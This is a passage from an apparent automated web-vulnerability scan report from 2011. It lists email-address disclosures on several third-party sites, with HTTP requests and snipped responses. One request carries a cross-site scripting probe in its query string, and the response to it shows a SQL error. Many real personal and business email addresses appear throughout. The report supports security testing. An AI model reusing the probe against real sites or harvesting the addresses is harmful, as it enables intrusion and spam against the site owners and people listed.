Host:   http://www.positioniseverything.net
Path:   /easyclearing.html

Issue detail

The following email address was disclosed in the response:
  • johnthebig66@yahoo.com

Request

GET /easyclearing.html HTTP/1.1
Host: www.positioniseverything.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:28 GMT
Server: Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8a
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 24290

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>


<title>Clearing a float container without source markup</title>

<meta http-equiv
...[SNIP]...
<a href="mailto:johnthebig66@yahoo.com">
...[SNIP]...

24.368. http://www.pwc-traderonline.com/research/resources/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pwc-traderonline.com
Path:   /research/resources/

Issue detail

The following email address was disclosed in the response:
  • advertising@pwc-traderonline.com

Request

GET /research/resources/ HTTP/1.1
Host: www.pwc-traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:00 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 21995


<!-- dstolweb04-php5a -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Personal Watercraft Resources: Finance, Insurance, Transport and More - PWC-Tra
...[SNIP]...
<a href="mailto:advertising@pwc-traderonline.com">advertising@pwc-traderonline.com</a>
...[SNIP]...

24.369. http://www.pwc-traderonline.com/sell/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pwc-traderonline.com
Path:   /sell/

Issue detail

The following email address was disclosed in the response:
  • customerservice@cycletrader.com

Request

GET /sell/ HTTP/1.1
Host: www.pwc-traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:59 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 26574


<!-- dstolweb05-php5a -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sell Your New or Used Personal Watercraft - PWC-TraderOnline.com</title>

...[SNIP]...
<a href="mailto:customerservice@cycletrader.com">customerservice@cycletrader.com</a>
...[SNIP]...

24.370. http://www.rdrop.com/users/billmc/adcomplain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rdrop.com
Path:   /users/billmc/adcomplain.html

Issue detail

The following email address was disclosed in the response:
  • billmc@agora.rdrop.com

Request

GET /users/billmc/adcomplain.html HTTP/1.1
Host: www.rdrop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:07 GMT
Server: Apache/1.3.20 (Unix) mod_jk mod_ssl/2.8.4 OpenSSL/0.9.6
Last-Modified: Wed, 16 May 2001 16:52:58 GMT
ETag: "4520-57b-3b02b06a"
Accept-Ranges: bytes
Content-Length: 1403
Connection: close
Content-Type: text/html

<HTML><HEAD><TITLE>Adcomplain Home Page</TITLE>
<BODY><H1>Adcomplain Home Page</H1>

Adcomplain is a tool for reporting inappropriate commercial e-mail and
usenet postings, as well as chain letters an
...[SNIP]...
<a href="mailto:billmc@agora.rdrop.com" >&lt;billmc@agora.rdrop.com&gt; </a>
...[SNIP]...

24.371. http://www.rochenhost.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rochenhost.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:
  • sales@rochen.com
  • sales@workgroup.im.rochen.com

Request

GET / HTTP/1.1
Host: www.rochenhost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:03 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e2d0a354c26b66b66bc6f05a696c10dc=80669e412b6181bd9078e98c7bbdca20; path=/
Last-Modified: Tue, 25 Jan 2011 00:09:04 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43499

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="mailto:sales@rochen.com?subject=Sales email from rochen.com"><span class="bg">sales@rochen.com</span>
...[SNIP]...
<a href="javascript:chat('http://chat.rochen.com/webchat/start.jsp?workgroup=sales@workgroup.im.rochen.com');">
...[SNIP]...

24.372. http://www.rochenhost.com/joomla-hosting

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rochenhost.com
Path:   /joomla-hosting

Issue detail

The following email addresses were disclosed in the response:
  • sales@rochen.com
  • sales@workgroup.im.rochen.com

Request

GET /joomla-hosting HTTP/1.1
Host: www.rochenhost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:25 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e2d0a354c26b66b66bc6f05a696c10dc=7d4ee1ec8dc4603d76d48b52c3e2104c; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:25 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43135

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="mailto:sales@rochen.com?subject=Sales email from rochen.com"><span class="bg">sales@rochen.com</span>
...[SNIP]...
<a href="javascript:chat('http://chat.rochen.com/webchat/start.jsp?workgroup=sales@workgroup.im.rochen.com');">
...[SNIP]...

24.373. http://www.rvtraderonline.com/research/resources/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rvtraderonline.com
Path:   /research/resources/

Issue detail

The following email address was disclosed in the response:
  • keyacctleads@rvtraderonline.com

Request

GET /research/resources/ HTTP/1.1
Host: www.rvtraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:15 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 23240


<!-- dstolweb07-php5b -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>RV Resources - RVTraderOnline.com</title>
   <meta name="description" content="Find crit
...[SNIP]...
<a href="mailto:keyacctleads@rvtraderonline.com" title="Email Key Accounts">keyacctleads@rvtraderonline.com</a>
...[SNIP]...

24.374. http://www.saddi.com/software/newsfish/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.saddi.com
Path:   /software/newsfish/

Issue detail

The following email address was disclosed in the response:
  • allan@saddi.com

Request

GET /software/newsfish/ HTTP/1.1
Host: www.saddi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:08 GMT
Server: Apache/2.2
Last-Modified: Tue, 24 May 2005 23:19:21 GMT
ETag: "9a8b58-10e3-3f7e26b0fd040"
Accept-Ranges: bytes
Content-Length: 4323
Connection: close
Content-Type: text/html

<html>

<head>
<title>newsfish Page</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"><!--
body {
color: black;
background-color: white;
f
...[SNIP]...
<a href="mailto:allan@saddi.com">
...[SNIP]...

24.375. http://www.safepeak.com/downloadtrial/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.safepeak.com
Path:   /downloadtrial/

Issue detail

The following email addresses were disclosed in the response:
  • info@safepeak.com
  • sales@safepeak.com

Request

GET /downloadtrial/ HTTP/1.1
Host: www.safepeak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=0ivcyr551tjfgm55s04oq255; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 02:28:40 GMT
Connection: close
Content-Length: 29620


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   SafePeak.com |
...[SNIP]...
<a class="darkGray" href="mailto:info@safepeak.com">info@safepeak.com</a>, <a class="darkGray"
                   href="mailto:info@safepeak.com">sales@safepeak.com</a>
...[SNIP]...

24.376. http://www.sailinganarchy.com/advertise.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /advertise.htm

Issue detail

The following email address was disclosed in the response:
  • scot@sailinganarchy.com

Request

GET /advertise.htm HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:41 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 21:56:20 GMT
ETag: "21dc76-3008-6c654900"
Accept-Ranges: bytes
Content-Length: 12296
Vary: User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="business" value="scot@sailinganarchy.com" />
...[SNIP]...

24.377. http://www.sailinganarchy.com/breymaiersailing.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /breymaiersailing.com

Issue detail

The following email address was disclosed in the response:
  • webmaster@sailinganarchy.com

Request

GET /breymaiersailing.com HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:28:42 GMT
Server: Apache
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 1984


<html>
<head>
<title>NetHere: URL Not Found (404)</title>
<link rev="made" href="mailto:webmaster@sailinganarchy.com">
<style>
a:link {
color : #092769;
}
a:visited {
color : #092769;

...[SNIP]...
<a href="mailto:webmaster@sailinganarchy.com">webmaster@sailinganarchy.com</a>
...[SNIP]...

24.378. http://www.sailinganarchy.com/calendar/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /calendar/index.php

Issue detail

The following email addresses were disclosed in the response:
  • support@yachtscoring.com
  • www.stcroixyc@gmail.com

Request

GET /calendar/index.php HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:42 GMT
Server: Apache
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 67338

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
<a href="http://www.stcroixyc@gmail.com" class="calendar_name">
...[SNIP]...
<a href="mailto:support@yachtscoring.com">
...[SNIP]...

24.379. http://www.sailinganarchy.com/editor/audio_video.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /editor/audio_video.php

Issue detail

The following email address was disclosed in the response:
  • editor@sailinganarchy.com

Request

GET /editor/audio_video.php HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:43 GMT
Server: Apache
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 122549

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Sailin News and
...[SNIP]...
<a href="mailto:editor@sailinganarchy.com">
...[SNIP]...

24.380. http://www.sailinganarchy.com/editor/pimpin.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /editor/pimpin.php

Issue detail

The following email addresses were disclosed in the response:
  • bill@farryachtsales.com
  • btomkies@regatta-manager.com
  • editor@sailinganarchy.com
  • info@BicSportNA.com
  • krista@trippdesign.net
  • sales@cstcomposites.com

Request

GET /editor/pimpin.php HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:44 GMT
Server: Apache
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 70163

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Sailin News and
...[SNIP]...
<a href="mailto:btomkies@regatta-manager.com">
...[SNIP]...
<a href="mailto:info@BicSportNA.com">info@BicSportNA.com</a>
...[SNIP]...
<a href="mailto:editor@sailinganarchy.com">
...[SNIP]...
<a href="mailto:krista@trippdesign.net">
...[SNIP]...
<a href="mailto:sales@cstcomposites.com">sales@cstcomposites.com</a>
...[SNIP]...
<a href="mailto:bill@farryachtsales.com">
...[SNIP]...

24.381. http://www.sailinganarchy.com/index_page1.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /index_page1.php

Issue detail

The following email address was disclosed in the response:
  • editor@sailinganarchy.com

Request

GET /index_page1.php HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:45 GMT
Server: Apache
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 112556

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="ke
...[SNIP]...
<a href="mailto:editor@sailinganarchy.com">
...[SNIP]...

24.382. http://www.sailinganarchy.com/index_page2.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /index_page2.php

Issue detail

The following email address was disclosed in the response:
  • markracine@gmail.com

Request

GET /index_page2.php HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:45 GMT
Server: Apache
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 97764

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="ke
...[SNIP]...
<a href="mailto:markracine@gmail.com">
...[SNIP]...
<a href="mailto:markracine@gmail.com">
...[SNIP]...

24.383. http://www.sailinganarchy.com/java/ad_rotation.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /java/ad_rotation.js

Issue detail

The following email address was disclosed in the response:
  • webmaster@EchoChrist.com

Request

GET /java/ad_rotation.js HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:47 GMT
Server: Apache
Last-Modified: Thu, 20 Jan 2011 16:33:10 GMT
ETag: "33467e-119f-b06bfd80"
Accept-Ranges: bytes
Content-Length: 4511
Vary: User-Agent
Connection: close
Content-Type: application/x-javascript

// Java Document
///////////////////////////////////////////////////////////
/// Magic Image Rotation ///
/// v 1.0.1 ///
/// Copyright 2007, Loyce Bradley Petrey ///
/// All Rights Reserved. ///
/// http://www.EchoChrist.com/MagicImage ///
/// webmaster@EchoChrist.com ///
/// ///
/// This script is free to use as long as this notice ///
/// remains unchanged and intact. ///
/// ///
/// This program is free software: you can redistribute ///
/// it and/or modify it
...[SNIP]...

24.384. http://www.sailinganarchy.com/none

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /none

Issue detail

The following email address was disclosed in the response:
  • webmaster@sailinganarchy.com

Request

GET /none HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:28:46 GMT
Server: Apache
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 1984


<html>
<head>
<title>NetHere: URL Not Found (404)</title>
<link rev="made" href="mailto:webmaster@sailinganarchy.com">
<style>
a:link {
color : #092769;
}
a:visited {
color : #092769;

...[SNIP]...
<a href="mailto:webmaster@sailinganarchy.com">webmaster@sailinganarchy.com</a>
...[SNIP]...

24.385. http://www.sailinganarchy.com/terms.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /terms.htm

Issue detail

The following email addresses were disclosed in the response:
  • ed@sailinganarchy.com
  • info@sailinganarchy.com

Request

GET /terms.htm HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:48 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 03:53:05 GMT
ETag: "21dc74-5410-a0df6a40"
Accept-Ranges: bytes
Content-Length: 21520
Vary: User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
notices from the materials. If you believe any content appearing on our website constitutes a copyright or trademark infringement of another parties&rsquo; rights, please contact us immediately at [info@sailinganarchy.com] to notify us.</font>
...[SNIP]...
r proprietary notices from the materials. If you believe any content appearing on our website constitutes a copyright infringement of another parties&rsquo; rights, please contact us immediately at ed@sailinganarchy.com to notify us of this infringement.</font>
...[SNIP]...

24.386. http://www.snowmobiletraderonline.com/sell/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.snowmobiletraderonline.com
Path:   /sell/

Issue detail

The following email address was disclosed in the response:
  • customerservice@cycletrader.com

Request

GET /sell/ HTTP/1.1
Host: www.snowmobiletraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:19 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 26532


<!-- dstolweb11-php5b -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Sell Your New or Used Snowmobile - SnowmobileTraderOnline.com</title>
   <meta name="desc
...[SNIP]...
<a href="mailto:customerservice@cycletrader.com">customerservice@cycletrader.com</a>
...[SNIP]...

24.387. http://www.soundingsonline.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET / HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 00:09:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=tuebuqj09e756i1v904bm8i7l6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:09:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.388. http://www.soundingsonline.com/about-us

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /about-us

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /about-us HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.389. http://www.soundingsonline.com/advertise

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /advertise

Issue detail

The following email addresses were disclosed in the response:
  • amber@soundingspub.com
  • c.francis@soundingspub.com
  • e.cirillo@soundingspub.com
  • f.lavigne@soundingspub.com
  • info@soundingspub.com
  • m.boyles@soundingspub.com
  • ryanvincent@soundingspub.com
  • tmarion@soundingspub.com
  • w.connor@soundingspub.com
  • wayne@soundingspub.com

Request

GET /advertise HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:30:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:30:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:tmarion@soundingspub.com">tmarion@soundingspub.com</a>
...[SNIP]...
<a href="mailto:f.lavigne@soundingspub.com">f.lavigne@soundingspub.com</a>
...[SNIP]...
<a href="mailto:ryanvincent@soundingspub.com">ryanvincent@soundingspub.com</a>
...[SNIP]...
<a href="mailto:wayne@soundingspub.com">wayne@soundingspub.com</a>
...[SNIP]...
<a href="mailto:amber@soundingspub.com">amber@soundingspub.com</a>
...[SNIP]...
<a href="mailto:w.connor@soundingspub.com">w.connor@soundingspub.com</a>
...[SNIP]...
<a href="mailto:m.boyles@soundingspub.com">m.boyles@soundingspub.com</a>
...[SNIP]...
<a href="mailto:c.francis@soundingspub.com">c.francis@soundingspub.com</a>
...[SNIP]...
<a href="mailto:amber@soundingspub.com">amber@soundingspub.com</a>
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.390. http://www.soundingsonline.com/archives

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /archives?'"--></style></script><script>alert(0x001E2B)</script> HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:27:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=2si0fjj7r75bjp5ncust0p83f6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:27:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.391. http://www.soundingsonline.com/boat-shop

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop
